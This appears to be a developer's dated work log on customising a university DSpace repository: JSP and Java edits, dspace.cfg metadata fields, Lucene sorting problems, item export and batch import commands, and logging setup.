There is a link called "email updates" updates that should allow a user to to subscribe to information about new submits. It is broken and for now has been commented out. Below are the commented out lines: [silvi003~/Documents/workspace/dspace-ir]$ xff -B 2 -A 2 'get.email.updates' ./jsp/local/layout/navbar-default.jsp-232-<!-- ./jsp/local/layout/navbar-default.jsp-233- <td nowrap="nowrap" class="navigationBarItem"> ./jsp/local/layout/navbar-default.jsp:234: <a class="navigationBarItem" href="<%= request.getContextPath() %>/subscribe">get email updates</a> ./jsp/local/layout/navbar-default.jsp-235- </td> ./jsp/local/layout/navbar-default.jsp-236- </tr> -- ./jsp/local/layout/navbar-home.jsp-152- <!-- ./jsp/local/layout/navbar-home.jsp-153- <td nowrap="nowrap" class="navigationBarItem"> ./jsp/local/layout/navbar-home.jsp:154: <a class="navigationBarItem" href="<%= request.getContextPath() %>/subscribe">get email updates</a> ./jsp/local/layout/navbar-home.jsp-155- </td> ./jsp/local/layout/navbar-home.jsp-156- -->

March 3, 2008

Changing the display mode for AgEcon

Two files had to be changed to make visible in the standard output a few new fields.

Changes to dspace.cfg

The following section of dspace.cfg was modified.

Changes to ItemTag.java

ItemTag.java had to be modified to properly read the new dspace.cfg.

Future changes

If fields need to be changed in the future only dspace.cfg will have to change.

DB commands for Dspace

See if a an item id is in the DB.

February 22, 2008

Process to do an itemexport for a collection in dspace

There is a way to extract items in a collection from dspace so that they have the form of a plane pdf and a flat xml files. This directories can be batch ingested back into dspace or another repository.

Finding a collection's ID

The file below shows how to find a collection's ID in dspace. getCollectionID

Brad Teal's filter_media.sh script

The filter-media.sh script will find all the handles of all the collections.

Execute the command to extract the data

[silvi003 /dspace/dspace-ir/bin]$ ./dsrun org.dspace.app.itemexport.ItemExport -t COLLECTION -i 29 -d /dspace/assetstore/udc_export/ima/ -n 0

Resulting Directory Structure

Resulting directories from ItemExport command.

February 15, 2008

Check that abort page for license contains no logic for AgEcon

We have moved the license page form the last [page of the submit to the first. The wording of the page says that the entry will be saved, but of course there is no entry. The wording can be easily changed, but I needed to check that the jsp was not executing any code (i.e. trying to write to a file or the DB). It is not so all is well.

January 25, 2008

Hardwire jsp initial questions

The initial questions checkbox on submit workflow needed to be hardwired. So I made all the buttons hidden and used javascript to automatically submit the form. This is a quick and dirty way to hardwire the values in a jsp form.
Original initial-questions.jsp

Hardwired version

Plan to add email field to name type in dspace submit

Currently the name type that is used to generate forms in dspace has two text fields (first and last name). We need a third field for email and below are the steps that must be taken to create this field.

Steps:

1) Copy edit-metadata.jsp to local -> confirm that new jsp is "live"

2) Confirm edu.umn.dspace.submit.step.DescribeStep is alive

3) Make "email_name" type from "name" type ... do not modify any code in "email_name" yet

4) Drop DCPersonName in "email_name" replace with string

5) Add three text fields to "email_name" in edit-metadata.jsp

6) Fix string in "email_name" code in edu.umn.dspace.submit.step.DescribeStep to handle 3rd field

January 11, 2008

Remove upload messages from AgEcon page

Remove upload messages from AgEcon page

The file choose-file.jsp had to be modified: <%-- <p class="submitFormHelp"><strong>Netscape users please note:</strong> By default, the window brought up by clicking "Browse..." will only display files of type HTML. If the file you are uploading isn't an HTML file, you will need to select the option to display files of other types. <object><dspace:popup page="/help/index.html#netscapeupload">Instructions for Netscape users</dspace:popup></object> are available.</p> --%> <%-- Louise Letnes and Julia Kelly wanted these messages deleted from the top of the upload page <div class="submitFormHelp"><fmt:message key="jsp.submit.choose-file.info3"/> <dspace:popup page="/help/index.html#netscapeupload"><fmt:message key="jsp.submit.choose-file.info4"/></dspace:popup></div> --%> <%-- FIXME: Collection-specific stuff should go here? --%> <%-- <p class="submitFormHelp">Please also note that the DSpace system is able to preserve the content of certain types of files better than other types. <object><dspace:popup page="/help/formats.jsp">Information about file types</dspace:popup></object> and levels of support for each are available.</p> --%> <%-- <div class="submitFormHelp"><fmt:message key="jsp.submit.choose-file.info6"/> <dspace:popup page="/help/formats.jsp"><fmt:message key="jsp.submit.choose-file.info7"/></dspace:popup> </div> --%>

January 7, 2008

Changes to AGEcon Submit -- First Set of Changes

I) Fields to add

1) Items to modify

Here are all the meta data for the agecon project The items labeled must be added to the submit form.
These items are:
A) hasEndPage
B) hasStartPage
C) ispartofname
D) ispartofnumber
C) ispartoftitle
D) ispartofvolume

B) Changes to the java code

Needed to modify the code shown below in from the Item.java class : public DCValue[] getDC(String element, String qualifier, String lang) { DCValue[] MetaData = getMetadata(MetadataSchema.DC_SCHEMA, element, qualifier, lang); if (MetaData.length == 0) MetaData = getMetadata("agecon", element, qualifier, lang); // return getMetadata(MetadataSchema.DC_SCHEMA, element, qualifier, lang); return MetaData; } This allows the software to recognize both agecon elements and dc, so the items will appear in in the verify step.

2) Making changers so that new items appear in search

A) In the file /config/dspace.cfg add lines to webui.itemdisplay.default so that it has the form below: webui.itemdisplay.default = dc.title, dc.title.alternative, \ dc.contributor.author, \ agecon.contributor.authorContact, \ dc.contributor.editor, \ agecon.contributor.editorContact, \ dc.subject, dc.date.issued(date), \ dc.relation.ispartofseries, \ dc.description.abstract, \ dc.description, \ agecon.relation.ispartoftitle, \ agecon.relation.ispartofnumber, \ agecon.relation.ispartofvolume, \ agecon.relation.ispartofname, \ agecon.format.hasStartPage, \ agecon.format.hasEndPage, \ dc.format.extent, \ dc.relation B) In the file config/language-packs/Messages.properties add: metadata.agecon.relation.ispartoftitle = Journal Title metadata.agecon.relation.ispartofnumber = Journal Number metadata.agecon.relation.ispartofvolume = Journal Volume metadata.agecon.relation.ispartofname = Journal Issue metadata.agecon.format.hasStartPage = From Page metadata.agecon.format.hasEndPage = To Page

All the new items are now visible in the dspace search.

II) Move License to the front

In the file item-submission.xml create a new Submisssion Processs with the license first. Make this submission process thew default.

III) Combine two description pages

By eliminating the xml below that separated two description pages (in the file input-forms.xml). I was able to combine two of the description pages. </page> <page number="2">

January 2, 2008

Possible ant builds for dspace

ant compile
ant build_wars
ant update
ant install_code
ant init_configs
ant setup_database
ant clean_database
ant load_registries
ant fresh_install
ant clean
ant public_api
ant javadoc

December 4, 2007

Location of pdfs after dspace submit

After the dspace submit process, the pdfs are sent to the directory:

/usr/local/dspace-sr-dev/assetstore

and are given cryptic names like:

/usr/local/dspace-sr-dev/assetstore/97/93/57/97935760829952567360200962040412392397


97935760829952567360200962040412392397 is a pdf file.

files modified for sort (final ingest into UDC)

Last week I did an svn commit to update UDC so that it would sort.
here are the files that were modified
M config/dspace.cfg
M src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
M src/org/dspace/search/DSQuery.java
M src/edu/umn/dspace/app/webui/jsptag/ItemListTag.java
M jsp/local/browse/items-by-date.jsp
M jsp/local/browse/items-by-subject.jsp
M jsp/local/browse/items-by-title.jsp
M jsp/local/browse/items-by-author.jsp
M jsp/local/search/results.jsp
M jsp/layout/location-bar.jsp

The two files below were modified during an earlier ingest:
src/org/dspace/search/DSIndexer.java
src/org/dspace/search/QueryArgs.java

see note of November 07, 2007

November 30, 2007

create-administrator ... makes an admin user in dspace

This cmd line function steps you though creating a admmin user in dspace

location:
/usr/local/dspace-sr-dev/bin/create-administrator


I had to make changes to the script documented below:
########################################################################### # Shell script creating a starting administrator account # Get the DSPACE/bin directory BINDIR=`dirname $0` #***************************************************************** # Within the dspace.jar for Agecon there was no class called: # edu.umn.dspace.administer.CreateAdministrator # however I found a class called: # org/dspace/administer/CreateAdministrator # I used that jar and this script worked properly # # #$BINDIR/dsrun edu.umn.dspace.administer.CreateAdministrator # # J Silvis # 29 Nov 2007 #***************************************************************** $BINDIR/dsrun org/dspace/administer/CreateAdministrator

November 7, 2007

Files changed to make ag econ sort

The files below were changed to make ag econ sort, by clicking the headers of the tables.
SR/trunk/config/dspace.cfg
SR/trunk/jsp/local/search/results.jsp
SR/trunk/src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
SR/trunk/src/org/dspace/search/DSIndexer.java
SR/trunk/src/org/dspace/search/DSQuery.java
SR/trunk/src/org/dspace/search/QueryArgs.java
SR/trunk/src/edu/umn/dspace/app/webui/jsptag/ItemListTag.java

This is R 57 in the SVN Repository

Continue reading "Files changed to make ag econ sort" »

October 30, 2007

Adding a new field to the dspace database

In the file ./config/dspace.cfg one finds:

search.index.1 = author:dc.contributor.*

search.index.2 = author:dc.creator.*

search.index.3 = title:dc.title.*

search.index.4 = keyword:dc.subject.*

search.index.5 = abstract:dc.description.abstract

search.index.6 = author:dc.description.statementofresponsibility

search.index.7 = series:dc.relation.ispartofseries

search.index.8 = abstract:dc.description.tableofcontents

search.index.9 = mime:dc.format.mimetype

search.index.10 = sponsor:dc.description.sponsorship

search.index.11 = identifier:dc.identifier.*

search.index.12 = language:dc.language.iso

search.index.13 = date:dc.date.issued

I added the line that is bolded.

After this line is added you must run:

ant init_configs -- update the config system

ant install_code -- compile the indexer code

And then the script below to reindex lucence:

/usr/local/dspace-sr-dev/bin/index-all


October 22, 2007

Report to John and Brad about dspace progress. Below is what I have the last few days with dspace.Jeff Attempt to use lucene to sort fields:1) Examined work by Rooma who attempted to solve the problem.2) She tried to use the lucene e

John & Brad,
Below is what I have the last few days with dspace.
Jeff


Attempt to use lucene to sort fields:
1) Examined work by Rooma who attempted to solve the problem.
2) She tried to use the lucene engine to sort the fields -> I tested lucence sort.
3) lucene will not sort tokenized fields.
4) Requests have been sent to lucene and dspace to create sortable tokenized fields. There seems to be some internal debate as to whether this is wise/possible.
5) Used lucuene 2.2 jar to dump all attributes of fields stored in our lucene DB (we are using the 2.0 jar which does not have this feature and I will return to the original jar).
6) The "isTokenized" attribute has the value “true� for all the fields except the field named “handle�.
7) In its current state, none of the fields of interest are sortable by lucene.

Unique problem of date field:
1) “date� field is not stored in lucence.
2) Likely generated in the jsp for the 10 records that are displayed.
3) derived from direct call to sql db?

My plans:
1) I talked to Bill and he says there is a way to index a field twice, as both tokenized and non-tokenized. I will explore this idea to make our fields sortable.
2) Brad and I have discussed the "date problem". Could go directly to sql or fix lucence.

Gains:
1) The lucuene 2.2 jar allows me to peer into the lucene DB and display all the properties of the stored fields.

Aliases for servlets

From the ./etc/dspace-web.xml file:

<servlet> <servlet-name>subject-search</servlet-name> <servlet-class>org.dspace.app.webui.servlet.ControlledVocabularySearchServlet</servlet-class> </servlet> <servlet> <servlet-name>simple-search</servlet-name> <servlet-class>org.dspace.app.webui.servlet.SimpleSearchServlet</servlet-class> </servlet>

Attributes of the fields in the Lucence database (in dspace) + sortable problem

I used the code below:

JavaCodeToDumpLuceneAttributes.html and found out that the fields in the lucene DB had the following attributes:

dspaceFields.html Fields cannot be tokenized if they are to be sortable. So none of the fields other then the handle are sortable.

October 17, 2007

Get logger running for dspace

1) stop tomcat



2) fix log level in dspace config file: dspace.cfg

config.template.log4j.properties = ${dspace.dir}/config/log4j.properties

config.template.log4j-handle-plugin.properties = ${dspace.dir}/config/log4j-handle-plugin.properties

config.template.oaicat.properties = ${dspace.dir}/config/oaicat.properties



3) run init_config ant task



4) make new war files

5) tomcat config file:

$CATALINA_HOME/conf/logging.properties contains

java.util.logging.ConsoleHandler.level = FINE

java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter

6) Start tomcat

October 15, 2007

Classes in dspace that touch LUCENE

All Classes that contain Lucene are in the
package org.dspace.search


Input:
./src/org/dspace/search/DSAnalyzer.java -> ./src/org/dspace/search/DSIndexer.java

Query
./src/org/dspace/search/DSTokenizer.java -> ./src/org/dspace/search/DSQuery.java

--------------------------------------------------------------------------------------------

DSIndexer is used by several classes
jgrep -l DSIndexer
./src/org/dspace/app/mediafilter/MediaFilterManager.java
./src/org/dspace/app/webui/servlet/admin/EditItemServlet.java
./src/org/dspace/content/Collection.java
./src/org/dspace/content/Community.java
./src/org/dspace/content/InstallItem.java
./src/org/dspace/content/Item.java
./src/org/dspace/search/DSIndexer.java
./src/org/dspace/search/DSQuery.java


DSQuery is used by several classes
jgrep -l DSQuery
./src/org/dspace/app/webui/servlet/ControlledVocabularySearchServlet.java
./src/org/dspace/app/webui/servlet/SimpleSearchServlet.java
./src/org/dspace/search/DSQuery.java


Other classed found in org.dspace.search
./src/org/dspace/search/Harvest.java
./src/org/dspace/search/HarvestedItemInfo.java
./src/org/dspace/search/QueryArgs.java
./src/org/dspace/search/QueryResults.java

October 12, 2007

Data files for dspace

Location in Odin to svn source files

Get data files from odin and loading them in the database

scp -r silvi003@odin.lib.umn.edu:/mnt/agecon_export/dc_mixed_nodata .


Loading the files used the command:
./dsrun edu.umn.dspace.administer.BatchImporter -R -a -e silvi003@umn.edu -s /Users/silvi003/dc_mixed_data/dc_mixed_nodata


I tried to change the code:

In DSIndexer class setting
wipe_existing = true;
Usually false. allowed the program to run much longer.

now it dies with:

Exception in thread "main" java.sql.SQLException: bad_dublin_core SchemaID=1, contributor author_contact
at org.dspace.content.Item.update(Item.java:1468)
at org.dspace.content.InstallItem.installItem(InstallItem.java:146)
at edu.umn.dspace.administer.BatchImporter.addItem(BatchImporter.java:670)
at edu.umn.dspace.administer.BatchImporter.addItems(BatchImporter.java:557)
at edu.umn.dspace.administer.BatchImporter.createCommunityStructure(BatchImporter.java:430)
at edu.umn.dspace.administer.BatchImporter.createCommunityStructure(BatchImporter.java:500)
at edu.umn.dspace.administer.BatchImporter.main(BatchImporter.java:267)

log:

2007-10-09 10:12:51,407 WARN org.dspace.content.Item @ silvi003@umn.edu::bad_dc:Bad DC field.
SchemaID=1, element: "contributor" qualifier: "author_contact" value: "Paterson,
Anna (anna@areu.org.af)"

Brad was able to edit the files and get some of the data to load. The word "urban" produced a useful search.

October 1, 2007

Things needed to set up dspace

- download eclipse
- eclipse svs plugin subclipse
- Tomcat
- postgress.jar
- config dspace.cfg files
- also see dspace.org

Continue reading "Things needed to set up dspace" »